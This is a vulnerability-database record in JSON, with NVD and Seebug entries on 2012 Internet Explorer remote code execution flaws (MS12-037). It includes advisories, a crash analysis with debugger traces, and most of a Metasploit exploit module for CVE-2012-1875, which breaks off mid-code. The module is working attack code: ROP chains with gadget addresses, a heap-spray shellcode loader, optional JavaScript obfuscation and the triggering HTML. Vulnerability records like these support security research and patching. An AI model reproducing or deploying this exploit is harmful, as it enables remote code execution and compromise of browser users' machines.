"cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:13:59", "description": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow, aka \"Col Element Remote Code Execution Vulnerability,\" as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1876", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1876", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1876", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:13:59", "description": "Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows user-assisted remote attackers to execute arbitrary code by accessing a deleted object, aka \"Developer Toolbar Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1874", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1874"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1874", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:02:21", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-1876. Reason: This candidate is a duplicate of CVE-2012-1876. Notes: All CVE users should reference CVE-2012-1876 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.", "cvss3": {}, "published": "2012-03-09T11:55:00", "type": "cve", "title": "CVE-2012-1544", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2012-1544", "CVE-2012-1876"], "modified": "2012-06-15T04:00:00", "cpe": [], "id": "CVE-2012-1544", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1544", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "seebug": [{"lastseen": "2017-11-19T17:51:42", "description": "CVE ID: CVE-2012-1880\r\n\r\nMicrosoft Internet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nMicrosoft Internet Explorer\u8bbf\u95ee\u5df2\u7ecf\u5220\u9664\u7684\u5bf9\u8c61\u65f6\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u4ee5\u7834\u574f\u5185\u5b58\u3002\n0\nMicrosoft Internet Explorer 9.x\r\nMicrosoft Internet Explorer 8.x\r\nMicrosoft Internet Explorer 7.x\r\nMicrosoft Internet Explorer 6.x\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cSEBUG\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n\r\n* \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08ms12-037\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nms12-037\uff1aCumulative Security Update for Internet Explorer (2699988)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/ms12-037.mspx", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "seebug", "title": "Microsoft IE insertRow\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e (MS12-037)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1880"], "modified": "2012-06-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60212", "id": "SSV:60212", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:51:41", "description": "CVE ID: CVE-2012-1878\r\n\r\nMicrosoft Internet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nIE\u8bbf\u95ee\u5df2\u7ecf\u5220\u9664\u7684\u5bf9\u8c61\u65f6\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u4ee5\u7834\u574f\u5185\u5b58\u3002\n0\nMicrosoft Internet Explorer 9.x\r\nMicrosoft Internet Explorer 8.x\r\nMicrosoft Internet Explorer 7.x\r\nMicrosoft Internet Explorer 6.x\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cSEBUG\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n\r\n* \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08ms12-037\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nms12-037\uff1aCumulative Security Update for Internet Explorer (2699988)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/ms12-037.mspx", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "seebug", "title": "Microsoft IE OnBeforeDeactivate\u4e8b\u4ef6\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e (MS12-037)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1878"], "modified": "2012-06-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60214", "id": "SSV:60214", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:23:03", "description": "No description provided by source.", "cvss3": {}, "published": "2012-06-14T00:00:00", "type": "seebug", "title": "Microsoft Internet Explorer 8 Code Execution(CVE-2012-1875)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1875"], "modified": "2012-06-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60216", "id": "SSV:60216", "sourceData": "\n [CAL-2012-0026] Microsfot IE Same ID Property Remote Code Execution Vulnerability\r\n\r\nCVE ID: CVE-2012-1875\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms12-037\r\nhttp://blog.vulnhunt.com/index.php/2012/06/13/cal-2012-0026-microsfot-ie-same-id-property-remote-code-execution-vulnerability/\r\n\r\n\r\n1 Affected Products\r\n=================\r\nIE8\r\nwe tested\u00a3\u00baInternet Explorer 8.0.6001.18702\r\n\r\n\r\n2 Vulnerability Details\r\n======================\r\n\r\nThe vulnerability occurs when a img element and a div element have same\r\nid property, when remove them, img\r\nelement is freed from memory, but CCollectionCache keep a reference to\r\nit, so it cause a use after free\r\nvulnerability, which can cause Remote Code Execution.\r\n\r\n\r\n\r\n3 Analysis\r\n===========\r\nasm in mshtml.dll\r\n\r\nbp mshtml!CCollectionCache::GetAtomFromName\r\nwhen break if ecx points to a CImgElement, remember ecx\r\nBreakpoint 0 hit\r\neax=03341301 ebx=033413e0 ecx=033413e0 edx=00000001 esi=0000030c\r\nedi=016aa348\r\neip=3db74101 esp=016aa300 ebp=016aa350 iopl=0 nv up ei pl nz na\r\npo nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00000202\r\nmshtml!CCollectionCache::GetAtomFromName:\r\n3db74101 8bff mov edi,edi\r\n0:008> dds ecx l4\r\n033413e0 3dabe880 mshtml!CImgElement::`vftable'\r\n033413e4 00000001\r\n033413e8 00000008\r\n033413ec 001a7ad0\r\n\r\n0:008> bd 0\r\n0:008> g\r\n(2178.2120): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=3db401b2 ebx=00000000 ecx=033413e0 edx=8bffff53 esi=033413e0\r\nedi=016aa348\r\neip=8bffff53 esp=016aa2dc ebp=016aa2ec iopl=0 nv up ei pl zr na\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010246\r\n8bffff53 ?? ???\r\n0:008> kb\r\nChildEBP RetAddr Args to Child\r\nWARNING: Frame IP not in any known module. Following frames may be wrong.\r\n016aa2d8 3db56ce7 3db61cdb 80020003 033413e0 0x8bffff53\r\n016aa2dc 3db61cdb 80020003 033413e0 016aa2fc mshtml!CElement::Doc+0x7\r\n016aa2ec 3db74116 00000000 0000030c 016aa350\r\nmshtml!CElement::GetAtomTable+0x10\r\n016aa2fc 3dac2bc9 009af5ac 00000003 03341301\r\nmshtml!CCollectionCache::GetAtomFromName+0x15\r\n016aa350 3dae11bd 033414a0 009af5ac 00000003\r\nmshtml!CCollectionCache::GetIntoAry+0x74\r\n016aa394 3dae1cb5 0000000d 009af5ac 016aa480\r\nmshtml!CCollectionCache::GetDispID+0x13e\r\n016aa3a8 3dacfa5c 033414a0 0000000d 009af5ac\r\nmshtml!DispatchGetDispIDCollection+0x3f\r\n016aa3d0 3db61de3 0019adf0 009af5ac 10000003\r\nmshtml!CElementCollectionBase::VersionedGetDispID+0x46\r\n016aa410 3e374e18 0019aeb0 009af5ac 10000003 mshtml!PlainGetDispID+0xdc\r\n016aa440 3e374d99 009af5ac 016aa480 0019aeb0\r\njscript!IDispatchExGetDispID+0xb7\r\n\r\nmshtml!CElement::Doc:\r\n3db56ce0 8b01 mov eax,dword ptr [ecx]\r\n3db56ce2 8b5070 mov edx,dword ptr [eax+70h]\r\n3db56ce5 ffd2 call edx\r\n3db56ce7 8b400c mov eax,dword ptr [eax+0Ch]\r\n\r\n\r\n4 Exploitable?\r\n============\r\nif overwrite freed memory with controlled content, combined with heap\r\nspray, can cause remote code execution.\r\n\r\nand we noticed that the exploitation attack in the wild.\r\n\r\n\r\n5 Crash info:\r\n===============\r\n(2430.2450): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=3db401b2 ebx=00000000 ecx=002455b8 edx=8bffff53 esi=002455b8\r\nedi=016aa348\r\neip=8bffff53 esp=016aa2dc ebp=016aa2ec iopl=0 nv up ei pl zr na\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010246\r\n8bffff53 ?? ???\r\n0:008> kb\r\nChildEBP RetAddr Args to Child\r\nWARNING: Frame IP not in any known module. Following frames may be wrong.\r\n016aa2d8 3db56ce7 3db61cdb 80020003 002455b8 0x8bffff53\r\n016aa2dc 3db61cdb 80020003 002455b8 016aa2fc mshtml!CElement::Doc+0x7\r\n016aa2ec 3db74116 00000000 0000030c 016aa350\r\nmshtml!CElement::GetAtomTable+0x10\r\n016aa2fc 3dac2bc9 009af528 00000003 00245501\r\nmshtml!CCollectionCache::GetAtomFromName+0x15\r\n016aa350 3dae11bd 00245678 009af528 00000003\r\nmshtml!CCollectionCache::GetIntoAry+0x74\r\n016aa394 3dae1cb5 0000000d 009af528 016aa480\r\nmshtml!CCollectionCache::GetDispID+0x13e\r\n016aa3a8 3dacfa5c 00245678 0000000d 009af528\r\nmshtml!DispatchGetDispIDCollection+0x3f\r\n016aa3d0 3db61de3 033329c0 009af528 10000003\r\nmshtml!CElementCollectionBase::VersionedGetDispID+0x46\r\n\r\n\r\n\r\n6 TIMELINE:\r\n==========\r\n2012/2/15 Dark son request code audit labs to analyze a POC example\r\n2012/2/15 we begin analyze\r\n2012/2/20 we comfirmed this is an exploitable 0day. report to Microsoft\r\n2012/2/21 Microsoft reply got the report.\r\n2012/2/25 Microsoft begin to investigate\r\n2012/3/1 Microsoft comfirmed this issue.\r\n2012/6/14 Microsoft public this bulletin.\r\n\r\n\r\n7 About Code Audit Labs:\r\n=====================\r\nCode Audit Labs secure your software,provide Professional include source\r\ncode audit and binary code audit service.\r\nCode Audit Labs:" You create value for customer,We protect your value"\r\nhttp://www.VulnHunt.com\r\nhttp://blog.Vulnhunt.com\r\nhttp://t.qq.com/vulnhunt\r\nhttp://weibo.com/vulnhunt\r\nhttps://twitter.com/vulnhunt\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60216", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:40:09", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1875"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-73100", "id": "SSV:73100", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => "MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a memory corruption flaw in Internet Explorer 8 when\r\n\t\t\t\thandling objects with the same ID property. At the moment this module targets\r\n\t\t\t\tIE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited\r\n\t\t\t\tin the wild.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Dark Son ', # Vulnerability discovery\r\n\t\t\t\t\t'Qihoo 360 Security Center', # Vulnerability discovery\r\n\t\t\t\t\t'Yichong Lin', # Vulnerability discovery\r\n\t\t\t\t\t'Google Inc.', # Vulnerability discovery\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'MSB', 'MS12-037'],\r\n\t\t\t\t\t[ 'CVE', '2012-1875' ],\r\n\t\t\t\t\t[ 'OSVDB', '82865'],\r\n\t\t\t\t\t[ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/'],\r\n\t\t\t\t\t[ 'URL', 'https://twitter.com/binjo/status/212795802974830592' ] # Exploit found in the wild\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => "\\x00",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'IE 8 on Windows XP SP3 with msvcrt ROP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :msvcrt,\r\n\t\t\t\t\t\t\t'RopOffset' => '0x5f4',\r\n\t\t\t\t\t\t\t'Ret' => 0x77c15ed5 # xchg eax, esp # ret # from msvcrt.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'IE 8 on Windows XP SP3 with JRE ROP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :jre,\r\n\t\t\t\t\t\t\t'RopOffset' => '0x5f4',\r\n\t\t\t\t\t\t\t'Ret' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'IE 8 on Windows 7 SP1 with JRE ROP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :jre,\r\n\t\t\t\t\t\t\t'RopOffset' => '0x5f4',\r\n\t\t\t\t\t\t\t'Ret' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => "Jun 12 2012",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t# If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\r\n\t\t\t#Windows XP SP3 + IE 8.0\r\n\t\t\treturn targets[1]\r\n\t\telsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\r\n\t\t\t#Windows 7 SP1 + IE 8.0\r\n\t\t\treturn targets[3]\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack("V").first\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack("V").first\r\n\tend\r\n\r\n\tdef ret(t)\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\treturn [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll\r\n\t\twhen :jre\r\n\t\t\treturn [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll\r\n\t\tend\r\n\tend\r\n\r\n\tdef popret(t)\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\treturn [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll\r\n\t\twhen :jre\r\n\t\t\treturn [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll\r\n\t\tend\r\n\tend\r\n\r\n\tdef get_rop_chain(t)\r\n\r\n\t\tadjust = ret(t) * 27\r\n\t\tadjust << popret(t)\r\n\t\tadjust << [t.ret].pack("V") # stackpivot\r\n\r\n\t\t# Both ROP chains generated by mona.py - See corelan.be\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tprint_status("Using msvcrt ROP")\r\n\t\t\trop =\r\n\t\t\t[\r\n\t\t\t\t0x77c4e392, # POP EAX # RETN\r\n\t\t\t\t0x77c11120, # <- *&VirtualProtect()\r\n\t\t\t\t0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\r\n\t\t\t\tjunk,\r\n\t\t\t\t0x77c2dd6c,\r\n\t\t\t\t0x77c4ec00, # POP EBP # RETN\r\n\t\t\t\t0x77c35459, # ptr to 'push esp # ret'\r\n\t\t\t\t0x77c47705, # POP EBX # RETN\r\n\t\t\t\t0x00001000, # EBX\r\n\t\t\t\t0x77c3ea01, # POP ECX # RETN\r\n\t\t\t\t0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t0x77c46100, # POP EDI # RETN\r\n\t\t\t\t0x77c46101, # ROP NOP (-> edi)\r\n\t\t\t\t0x77c4d680, # POP EDX # RETN\r\n\t\t\t\t0x00000040, # newProtect (0x40) (-> edx)\r\n\t\t\t\t0x77c4e392, # POP EAX # RETN\r\n\t\t\t\tnop, # NOPS (-> eax)\r\n\t\t\t\t0x77c12df9, # PUSHAD # RETN\r\n\t\t\t].pack("V*")\r\n\r\n\t\twhen :jre\r\n\t\t\tprint_status("Using JRE ROP")\r\n\t\t\trop =\r\n\t\t\t[\r\n\t\t\t\t0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n\t\t\t\t0x00001000, # (dwSize)\r\n\t\t\t\t0x7c347f98, # RETN (ROP NOP)\r\n\t\t\t\t0x7c3415a2, # JMP [EAX]\r\n\t\t\t\t0xffffffff,\r\n\t\t\t\t0x7c376402, # skip 4 bytes\r\n\t\t\t\t0x7c345255, # INC EBX # FPATAN # RETN\r\n\t\t\t\t0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN\r\n\t\t\t\t0x7c344f87, # POP EDX # RETN\r\n\t\t\t\t0x00000040, # flNewProtect\r\n\t\t\t\t0x7c34d201, # POP ECX # RETN\r\n\t\t\t\t0x7c38b001, # &Writable location\r\n\t\t\t\t0x7c347f97, # POP EAX # RETN\r\n\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]\r\n\t\t\t\t0x7c378c81, # PUSHAD # ADD AL,0EF # RETN\r\n\t\t\t\t0x7c345c30, # ptr to 'push esp # ret '\r\n\t\t\t].pack("V*")\r\n\t\tend\r\n\r\n\t\tcode = adjust\r\n\t\tcode << rop\r\n\t\treturn code\r\n\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error("Browser not supported: #{agent}")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status("Client requesting: #{request.uri}")\r\n\r\n\t\tp = payload.encoded\r\n\r\n\t\tjs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\r\n\t\tjs_padding = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(my_target.arch))\r\n\t\tjs_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))\r\n\t\tjs_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\r\n\r\n\t\tjs_spray = <<-JS\r\n\t\tvar heap_obj = new heapLib.ie(0x20000);\r\n\t\tvar code = unescape("#{js_code}");\r\n\t\tvar rop_chain = unescape("#{js_rop}");\r\n\t\tvar random = unescape("#{js_padding}");\r\n\t\tvar nops = unescape("#{js_nops}");\r\n\r\n\t\twhile (random.length < 0x80000) random += random;\r\n\t\twhile (nops.length < 0x80000) nops += nops;\r\n\r\n\t\tvar padding = random.substring(0, #{my_target['RopOffset']}-code.length);\r\n\t\tvar shellcode = code + padding + rop_chain + nops.substring(0, 0x800-code.length-padding.length-rop_chain.length);\r\n\r\n\t\twhile (shellcode.length < 0x40000) shellcode += shellcode;\r\n\t\tvar block = shellcode.substring(0, (0x80000-6)/2);\r\n\r\n\t\theap_obj.gc();\r\n\t\tfor (var z=1; z < 0x385; z++) {\r\n\t\t\theap_obj.alloc(block);\r\n\t\t}\r\n\t\tJS\r\n\r\n\t\tjs_spray = heaplib(js_spray, {:noobfu => true})\r\n\r\n\t\ttrigger_f = "trigger"\r\n\t\tfeng_shui_f = "feng_shui"\r\n\t\tcrash_f = "crash"\r\n\t\tunescape_f = "do_unescape"\r\n\t\tmain_f = "main"\r\n\t\ta_id = "MyA"\r\n\t\tdanger_id = "imgTest"\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs_spray = ::Rex::Exploitation::JSObfu.new(js_spray)\r\n\t\t\tjs_spray.obfuscate\r\n\r\n\t\t\ttrigger_f = rand_text_alpha(rand(5) + 4)\r\n\t\t\tfeng_shui_f = rand_text_alpha(rand(5) + 4)\r\n\t\t\tcrash_f = rand_text_alpha(rand(5) + 4)\r\n\t\t\tunescape_f = rand_text_alpha(rand(5) + 4)\r\n\t\t\tmain_f = rand_text_alpha(rand(5) + 4)\r\n\t\t\ta_id = rand_text_alpha(rand(5) + 4)\r\n\t\t\tdanger_id = rand_text_alpha(rand(5) + 4)\r\n\t\tend\r\n\r\n\t\thtml = %Q|\r\n\t\t\t<HTML>\r\n\t\t\t<BODY>\r\n\t\t\t<title></title>\r\n\t\t\t<DIV id=testfaild>\r\n\t\t\t\t<img id="#{danger_id}" style="display:none">\r\n\t\t\t\t<a href="javascript:#{feng_shui_f}();" id="#{a_id}" onClick="#{feng_shui_f}();">\r\n\t\t\t\t<div style="background-color:#FFFFFF; width:30; height:40" id="#{danger_id}" src="" onMouseOver="#{crash_f}();" onMouseOut="#{crash_f}();">\r\n\t\t\t\t</div>\r\n\t\t\t\t</a>\r\n\t\t\t</DIV>\r\n\t\t\t<SCRIPT LANGUAGE="JavaScript">\r\n\t\t\tfunction #{unescape_f}(dword) {\r\n\t\t\t\tvar t = unescape;\r\n\t\t\t\tvar d = Number(dword).toString(16);\r\n\t\t\t\twhile (d.length < 8) d = '0' + d;\r\n\t\t\t\treturn t('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n\t\t\t}\r\n\t\t\tfunction #{feng_shui_f}() {\r\n\t\t\t\tvar tag = 0x1c1c1c0c;\r\n\t\t\t\tvar vtable1 = #{unescape_f}(tag) + '1234567555555555588888888';\r\n\t\t\t\tvar divs = new Array();\r\n\t\t\t\tfor (var i = 0; i < 128; i++) divs.push(document.createElement('div'));\r\n\t\t\t\ttestfaild.innerHTML = testfaild.innerHTML;\r\n\t\t\t\tdivs[0].className = vtable1;\r\n\t\t\t\tdivs[1].className = vtable1;\r\n\t\t\t\tdivs[2].className = vtable1;\r\n\t\t\t\tdivs[3].className = 